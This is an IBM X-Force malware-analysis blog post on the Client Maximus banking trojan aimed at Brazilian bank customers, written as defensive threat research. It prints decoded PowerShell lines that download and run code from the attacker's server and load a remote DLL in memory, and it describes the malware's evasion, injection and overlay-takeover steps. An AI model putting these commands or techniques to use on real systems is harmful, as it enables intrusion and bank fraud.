In January 2017, IBM X-Force research reported the development of a new remote-access malware code targeting Brazilian banks. The malware, dubbed Client Maximus, was observed in ongoing campaigns and continues to target online banking users in the country. The development of Client Maximus, which is believed to be commercially available in Brazilian fraud and cybercrime communities, continues as new variants of the malware emerge.

IBM X-Force recently analyzed a new and upgraded version of the malware. Client Maximus appears to have been written specifically for attacks against Brazilian banks. Analysis of different components of this code led our researchers to the overall understanding of the growing sophistication of cybercrime tools in Brazil.

Read the white paper: Shifting the balance of power with cognitive fraud prevention

Initial Malware Download

The initial infection routine begins with an obfuscated LNK file that runs CMD.exe /c with PowerShell.exe as a parameter. PowerShell, in turn, gets its own parameter, a Base64-encoded script, which is immediately executed before it downloads another file from the attacker’s control server and executes it.

An interesting note about the initial LNK file being used by Client Maximus is that the complete Base64-encoded PowerShell script is not visible in the Windows user interface, even when clicking “Properties” on the file. It is only visible to a dedicated ShellLink parser or hex editor.

We decoded the PowerShell code from its Base64 format and received the following:

CleAr-HoST;iEX(NEW-oBjEcT nET.webClIEnT).DoWnLOaDSTRiNg(‘hxxps://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8MHVvRA%3D%3D%’)

Scroll to view full table

The resulting downloaded file is yet another obfuscated PowerShell script that fetches a .NET assembly named “Loader.” That element is dynamically loaded as follows:

$bytes = (New-Object Net.WebClient).DownloadData(“hxxps://1361227624.rsc.cdn77.org/v2/loader.dll”)

[Reflection.Assembly]::Load($bytes)

Scroll to view full table

The next step is the execution of what the malware’s developer named a “Go” method on the dynamically loaded assembly (see code in REF _Ref492900569 \h \* MERGEFORMAT Figure 1):

[Loader]::Go(“hxxps://1361227624.rsc.cdn77.org/v2/”,”CpWY”)

Scroll to view full table

The “Go” method performs the following checks on the environment as a means to evade discovery by unwanted parties and anti-malware tools:

  • Is the IP address inside the Brazilian IP range?
  • Scans for the presence of a number of security applications on the endpoint;
  • Creates random names for files and folders to be created; and
  • Downloads corresponding payload from control server to match either the 32-bit Windows machine or 64-bit version.

After the loader’s run, the original PowerShell script proceeds to create two files:

  1. A VB script file that will execute the payload once it is downloaded:
  2. A LNK file (shortcut) to execute the aforementioned VB script.

In the last step before the payload arrives, the PowerShell script executes the LNK file, which, in turn, executes the VBS file:

Start-Process $lnkFileName

Scroll to view full table

The Client Maximus Four-Part Payload

The malware’s payload itself comprises four randomly named files. On our sample during the analysis, those files came up as:

File names will vary between variants and machines, as the malware randomly prenames them before actual creation. Let’s have a look at what these components do.

WindowsAnytimeUpgradeResults.exe.config

This file contains only the .NET-supported runtimes for the associated executable file that carries the same name. It is of little value in that sense.

WindowsAnytimeUpgradeResults.exe

This file presents known .NET WinForm software for the legitimate encryption/decryption process of PowerShell scripts, usually by IT administrators. WinForm, or Windows Forms, is a graphical class library included as a part of the Microsoft .NET Framework that provides a platform to write rich client applications for desktop, laptop and tablet PCs. This specific instance is known as PShellExec. In the context of the malware’s operation, it is used to decrypt the heavily obfuscated PowerShell script, noted as 2620343c, using the Zebra Bank Structure (ZBS) file as an argument.

To make debugging more arduous, the malware’s developer ensured that the runtime obfuscation of strings and some junk code is multi-threaded.

2620343c.zbs

ZBS files are typically used for data structure input/output. This file is, in reality, .NET-emitted code saved as a compressed byte array and encoded in Base64. This assembly, called Scripter.exe, is also quite heavily obfuscated and is loaded at runtime by the first executable using Assembly.Load(byte[]) and MethodInfo.Invoke().

The output of WindowsAnytimeUpgradeResults.exe is an obfuscated PowerShell script that performs remote loading of a dynamic link library (DLL) into a remote process, practically replacing Windows Loader. This technique, called reflective PE injection, is part of the PowerSploit suite, which offers various other features, such as logon token exfiltration and persistence techniques.

This final PowerShell code creates a new cmd.exe process and uses the DLL above to inject its payload into the legitimate cmd.exe process:

The following diagram gives an overview of the infection routine applied by this new variant of the Client Maximus banking malware:

Logical Attack Flow on the Victim’s Side

Once the endpoint has been successfully infected with the malware, Client Maximus will continually monitor the user’s browsing activity. When the user tries to reach his or her bank’s website — if that bank is on the malware operator’s target list — Client Maximus will go into action.

The malware’s top-level modus operandi is simple, yet effective:

  • Upon detecting a matching bank site/application, it launches full-screen overlay images to block the victim’s access to the banking session he or she initiated in the browser. Those screens also communicate fake messages to the victim, using social engineering to keep them waiting while the fraudster initiates a remote-access session to take control of the endpoint.
  • Client Maximus leverages remote control capabilities to take over the victim’s device, allowing the attacker to attempt a fraudulent transaction from that trusted endpoint. Moreover, for cases where the victim uses an application, rather than a website, for banking activity, the attacker can access that application on the desktop, see virtual keyboard activity and monitor the user’s actions in real time.

Client Maximus’ modus operandi is not much different from previous malicious code categorized under the remote overlay family. The scheme appears in further detail in our previous blog about Client Maximus.

Brazilian Malware Escalating in Sophistication

In 2017, IBM X-Force is seeing an ongoing escalation of malware codes in Brazil. After collaboration with external parties, it appears that there has been a permanent step-up in sophistication of malware codes.

On top of frequently seeing new Client Maximus variants operated by different actors and the upgrade the malware has recently undergone, X-Force researchers also found a new code being propagated in Brazil. The code is named Vernon, and more information about the malware will be available in the coming week from IBM X-Force.

Banks wishing to protect their customers from evolving threats and cybercrime modus operandi are invited to learn more about IBM Trusteer advanced fraud protection.

Individuals looking for tips on protecting themselves from remote overlay malware and other banking Trojans are invited to read our tips page for staying safer on PC/mobile devices.

We worked with the following MD5 hashes for this blog:

Read the white paper: Shifting the balance of power with cognitive fraud prevention

More from Malware

Ongoing ITG05 operations leverage evolving malware arsenal in global campaigns

13 min read - As of March 2024, X-Force is tracking multiple ongoing ITG05 phishing campaigns featuring lure documents crafted to imitate authentic documents of government and non-governmental organizations (NGOs) in Europe, the South Caucasus, Central Asia, and North and South America. The uncovered lures include a mixture of internal and publicly available documents, as well as possible actor-generated documents associated with finance, critical infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production. Beginning in November 2023, X-Force observed ITG05…

X-Force Threat Intelligence Index 2024 reveals stolen credentials as top risk, with AI attacks on the horizon

4 min read - Every year, IBM X-Force analysts assess the data collected across all our security disciplines to create the IBM X-Force Threat Intelligence Index, our annual report that plots changes in the cyber threat landscape to reveal trends and help clients proactively put security measures in place. Among the many noteworthy findings in the 2024 edition of the X-Force report, three major trends stand out that we’re advising security professionals and CISOs to observe: A sharp increase in abuse of valid accounts…

Hive0051’s large scale malicious operations enabled by synchronized multi-channel DNS fluxing

12 min read - For the last year and a half, IBM X-Force has actively monitored the evolution of Hive0051’s malware capabilities. This Russian threat actor has accelerated its development efforts to support expanding operations since the onset of the Ukraine conflict. Recent analysis identified three key changes to capabilities: an improved multi-channel approach to DNS fluxing, obfuscated multi-stage scripts, and the use of fileless PowerShell variants of the Gamma malware. As of October 2023, IBM X-Force has also observed a significant increase in…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today